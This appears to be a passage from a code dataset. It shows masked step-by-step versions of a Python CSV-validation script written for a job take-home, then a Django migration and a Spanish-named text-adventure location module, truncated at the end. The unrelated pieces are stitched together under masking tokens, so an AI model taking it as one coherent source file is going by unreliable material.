else:\n valid = False\n return indices, valid\n\n\n<mask token>\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, 
valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-4": "import csv, os, sys, pickle\nfrom datetime import date\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n 
except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-5": "#Created by Jake Hansen for Zebra interview take home assessment, July 2020.\nimport csv, os, sys, pickle\nfrom datetime import date\n\n#Class For storing information about each file generally. Helpful for future\n#use cases to remember the indicies from a file, if file has thousands of fields\n#Also can be used as a log to store daily number of 'good' vs 'bad' rows\nclass DataSource:\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n# getHeaderIndexes(indices, headers)\n# Requires: Pre-populated indices dictionary, the header's row from a CSV file with\n# naming convention conforming to the schema output from the directions\n# Effects: Determines if file has the necessary colums to match the desired output\n# schema\n# Modifies: The indices variable, returning the correct indices within the csv row\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a,b,c,d,e,f,g = False, False, False, False,False,False,False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if a == True and b == True and c == True and d == True and e == True and f == True and g == True:\n valid = True\n else:\n valid = False\n return indices, valid\n\n# isRowValid(indices,row)\n# Requires: a valid CSV file with columns necessary to match the expected output\n# Effects: Determines if a single row should be added to the final output, or if\n# the row is missing data / has incorrect data types for the field and thus\n# will not be added to the output but instead printed out\n# Modifies: N/A\ndef isRowValid(indices, row):\n #String Non-Nullables\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n\n #Float Non Nullables\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n\n #String Nullables\n sNs = ['Phone Number']\n #No Check Required, because it can be nullable or a string. 
I do assume that\n #it is required to have a \"Phone Number\" column, which is checked for in getHeaderIndexes\n\n return True\n\n# addUsableRow(indices, row, finalOutput)\n# Requires: The row is known to follow the output schema as specificed in the requirements\n# Effects: Adds row variables in the order specified in the output schema\n# Modifies: the final output variable\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n\n temp = '\"'+ pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' + phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n'\n finalOutput += temp\n return finalOutput\n\n# addErrorRow(indices, row, errorFinalOutput)\n# Requires: The row does not follow the output schema\n# Effects: adds the row to the error output variable that will be printed out\n# Modifies: the error final output string which gets printed at the end of the daily\n# job / procedure / script/ whatever The Zebra prefers to call these python data projects\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n#Variables and data structures\nfinalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\\n'\nerrorFinalOutput = ''\n# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\n# pickelFileName = 'pickleTest/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {\n \"Provider Name\": 0,\n \"CampaignID\": 0,\n \"Cost Per Ad Click\": 0,\n \"Redirect Link\": 0,\n \"Phone Number\": 0,\n \"Address\": 0,\n \"Zipcode\": 0\n}\n\n#InputFiles in list form\n# inputList = [\n# 'inputFilesTest/Auto.csv',\n# 'inputFilesTest/Home.csv'\n# ]\n\n# InputFiles in a directory\ninputDirectory = 'inputFiles'\n\n#check if files are too large, or non-csv files\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n # currentLines += sum(1 for line in open(file))\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\n\n#Main Algorithm loop through all files in the list\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n #usableRows and errorRows used for storing information from each data source\n usableRows = 0\n errorRows = 0\n # with open(file, newline='') as f:\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent,row, finalOutput)\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n pickleDict[file] = 
indicesCurrent\n\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n\n f.close()\n #Add dataSource Information for possible future needs and logging purposes\n newDataSource = DataSource(file,usableRows, errorRows, indices)\n dataSources.append(newDataSource)\n\n#Create file with rows containing correct schema\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\n\n#print the incorrect rows\nprint(errorFinalOutput)\n\n#Create Pickel file containing data source info for daily logging\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\n\n#Create Pickle File dictionary with indices specific info for filenames\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\n\n#Thank you line\nprint(\"Thanks for taking the time to look at my code and consider me for this position. Cheers!\")\n",
"step-ids": [
5,
6,
8,
9,
10
]
}
|
[
5,
6,
8,
9,
10
] |
# Generated by Django 2.1.2 on 2018-10-19 22:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='mascota',
name='descripcion',
field=models.CharField(max_length=200),
),
]
|
normal
|
{
"blob_id": "fcfec60a2302ee0c1385add053d4371040a2aff4",
"index": 3667,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('core', '0001_initial')]\n operations = [migrations.AlterField(model_name='mascota', name=\n 'descripcion', field=models.CharField(max_length=200))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('core', '0001_initial')]\n operations = [migrations.AlterField(model_name='mascota', name=\n 'descripcion', field=models.CharField(max_length=200))]\n",
"step-5": "# Generated by Django 2.1.2 on 2018-10-19 22:13\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='mascota',\n name='descripcion',\n field=models.CharField(max_length=200),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import items
import grupo
class Conexion:
def __init__(self, direccion, destino):
self.set_direccion(direccion)
self.set_destino(destino)
def __repr__(self):
return str(self.direccion()) + ' => ' + str(self.destino())
def direccion(self):
return self._direccion
def set_direccion(self, direccion):
self._direccion = direccion
def destino(self):
return self._destino
def set_destino(self, destino):
self._destino = destino
class GrupoConexiones(grupo.Grupo):
def conexiones(self):
return self.coleccion()
def conecta_al(self, direccion):
for conexion in self.conexiones():
if conexion.direccion() == direccion:
return conexion.destino()
return localidad_nula
class Localidad:
def __init__(self, nombre, descripcion, conexiones=None, contiene=None):
self.set_nombre(nombre)
self.set_descripcion(descripcion)
self._conexiones = GrupoConexiones(conexiones)
self._grupo_items = items.GrupoItems(contiene)
def __repr__(self):
return self.nombre()
def nombre(self):
return self._nombre
def set_nombre(self, nombre):
self._nombre = nombre
def descripcion(self):
return self._descripcion
def set_descripcion(self, descripcion):
self._descripcion = descripcion
def conexiones(self):
return self._conexiones
def items(self):
return self._grupo_items
def describir(self):
print(self.nombre())
print(self.descripcion())
if not self.items().esta_vacio():
print('También puedes ver:')
for item in self.items():
print('-', item.nombre())
def conecta_con(self, iterable):
self.conexiones().meter_masivo(iterable)
def conecta_al(self, direccion):
return self.conexiones().conecta_al(direccion)
def meter_conexion(self, conexion):
self.conexiones().meter(conexion)
def contiene_token(self, token):
return self.items().contiene_token(token)
# def meter_item(self, item):
# self._grupo_items.meter(item)
# def sacar_item(self, item):
# self._grupo_items.sacar(item)
# def contiene_item(self, item):
# return self._grupo_items.contiene(item)
# def tiene_items(self):
# return self._grupo_items.esta_vacio()
localidad_nula = Localidad('NULA', 'Localidad nula.')
|
normal
|
{
"blob_id": "f59e61977f7c72ab191aadccbd72d23f831b3a1c",
"index": 7050,
"step-1": "<mask token>\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n <mask token>\n <mask token>\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n <mask token>\n <mask token>\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n <mask token>\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n <mask token>\n\n def set_destino(self, destino):\n self._destino = destino\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n\n def __repr__(self):\n return str(self.direccion()) + ' => ' + str(self.destino())\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n\n def destino(self):\n return self._destino\n\n def set_destino(self, destino):\n self._destino = destino\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\nlocalidad_nula = Localidad('NULA', 'Localidad nula.')\n",
"step-4": "import items\nimport grupo\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n\n def __repr__(self):\n return str(self.direccion()) + ' => ' + str(self.destino())\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n\n def destino(self):\n return self._destino\n\n def set_destino(self, destino):\n self._destino = destino\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\nlocalidad_nula = Localidad('NULA', 'Localidad nula.')\n",
"step-5": "import items\nimport grupo\n\nclass Conexion:\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n\n def __repr__(self):\n return str(self.direccion()) + ' => ' + str(self.destino())\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n\n def destino(self):\n return self._destino\n\n def set_destino(self, destino):\n self._destino = destino\n\nclass GrupoConexiones(grupo.Grupo):\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\nclass Localidad:\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n # def meter_item(self, item):\n # self._grupo_items.meter(item)\n\n # def sacar_item(self, item):\n # 